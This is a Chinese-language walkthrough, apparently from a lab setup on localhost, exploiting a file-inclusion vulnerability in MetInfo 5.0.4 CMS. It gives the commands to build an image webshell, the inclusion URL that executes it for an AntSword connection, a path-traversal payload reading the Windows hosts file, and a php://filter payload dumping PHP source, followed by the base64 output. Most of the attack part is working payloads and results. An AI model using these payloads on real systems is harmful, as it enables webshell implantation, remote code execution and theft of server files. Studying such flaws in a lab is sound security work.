目录
登录管理员界面
http://127.0.0.1/MetInfo5.0.4/admin/
上传一句话木马,或者图片马
制作图片木马
copy 1.jpg/b+1.php/a 2.jpg
文件包含
首页
漏洞描述:
MetInfo 是一个专业的企业级CMS建站系统,它5.0.4 版本存文件包含漏洞
漏洞等级
高危
影响版本
metInfo5.04
产生文件包含的文件为【/about/index.php】,此页面非常的简洁
漏洞利用
/about/index.php?fmodule=7&module=[filePath]
蚁剑连接图片马
图片马制作:
copy 1.jpg/b+1.php/a 22.jpg
上传图片木马,通过文件包含的方式去访问
使用蚁剑连接
http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../upload/file/22.jpg
读取敏感目录
http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../../../../../../../../../../../windows/system32/drivers/etc/hosts
读取php源码
http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php
读取结果:
PD9waHANCiMgTWV0SW5mbyBFbnRlcnByaXNlIENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW0gDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sTHRkIChodHRwOi8vd3d3Lm1ldGluZm8uY24pLiBBbGwgcmlnaHRzIHJlc2VydmVkLiANCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9jb21tb24uaW5jLnBocCc7DQppZighJGlkICYmICRjbGFzczEpJGlkID0gJGNsYXNzMTsNCiRzaG93ID0gJGRiLT5nZXRfb25lKCJTRUxFQ1QgKiBGUk9NICRtZXRfY29sdW1uIFdIRVJFIGlkPSRpZCBhbmQgbW9kdWxlPTEiKTsNCmlmKCEkc2hvd3x8ISRzaG93Wydpc3Nob3cnXSl7DQpva2luZm8oJy4uLzQwNC5odG1sJyk7DQp9DQokbWV0YWNjZXNzPSRzaG93W2FjY2Vzc107DQppZigkc2hvd1tjbGFzc3R5cGVdPT0zKXsNCiRzaG93MyA9ICRkYi0+Z2V0X29uZSgiU0VMRUNUICogRlJPTSAkbWV0X2NvbHVtbiBXSEVSRSBpZD0nJHNob3dbYmlnY2xhc3NdJyIpOw0KJGNsYXNzMT0kc2hvdzNbYmlnY2xhc3NdOw0KJGNsYXNzMj0kc2hvd1tiaWdjbGFzc107DQokY2xhc3MzPSRzaG93W2lkXTsNCn1lbHNlew0KJGNsYXNzMT0kc2hvd1tiaWdjbGFzc10/JHNob3dbYmlnY2xhc3NdOiRpZDsNCiRjbGFzczI9JHNob3dbYmlnY2xhc3NdPyRpZDoiMCI7DQokY2xhc3MzPTA7DQp9DQoNCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9oZWFkLnBocCc7DQokY2xhc3MxX2luZm89JGNsYXNzX2xpc3RbJGNsYXNzMV07DQokY2xhc3MxX2xpc3Q9JGNsYXNzMV9pbmZvOw0KJGNsYXNzMl9pbmZvPSRjbGFzc19saXN0WyRjbGFzczJdOw0KJGNsYXNzM19pbmZvPSRjbGFzc19saXN0WyRjbGFzczNdOw0KJHNob3dbY29udGVudF09Y29udGVudHNob3coJzxkaXY+Jy4kc2hvd1tjb250ZW50XS4nPC9kaXY+Jyk7DQokc2hvd1tkZXNjcmlwdGlvbl09JHNob3dbZGVzY3JpcHRpb25dPyRzaG93W2Rlc2NyaXB0aW9uXTokbWV0X2tleXdvcmRzOw0KJHNob3dba2V5d29yZHNdPSRzaG93W2tleXdvcmRzXT8kc2hvd1trZXl3b3Jkc106JG1ldF9rZXl3b3JkczsNCiRtZXRfdGl0bGU9JG1ldF90aXRsZT8kc2hvd1snbmFtZSddLictJy4kbWV0X3RpdGxlOiRzaG93WyduYW1lJ107DQppZigkc2hvd1snY3RpdGxlJ10hPScnKSRtZXRfdGl0bGU9JHNob3dbJ2N0aXRsZSddOw0KcmVxdWlyZV9vbmNlICcuLi9wdWJsaWMvcGhwL21ldGh0bWwuaW5jLnBocCc7DQppbmNsdWRlIHRlbXBsYXRlKCdzaG93Jyk7DQpmb290ZXIoKTsNCiMgVGhpcyBwcm9ncmFtIGlzIGFuIG9wZW4gc291cmNlIHN5c3RlbSwgY29tbWVyY2lhbCB1c2UsIHBsZWFzZSBjb25zY2lvdXNseSB0byBwdXJjaGFzZSBjb21tZXJjaWFsIGxpY2Vuc2UuDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sIEx0ZC4gKGh0dHA6Ly93d3cubWV0aW5mby5jbikuIEFsbCByaWdodHMgcmVzZXJ2ZWQuDQo/
得出base64编码格式的数据,使用bp的Decoder功能解码
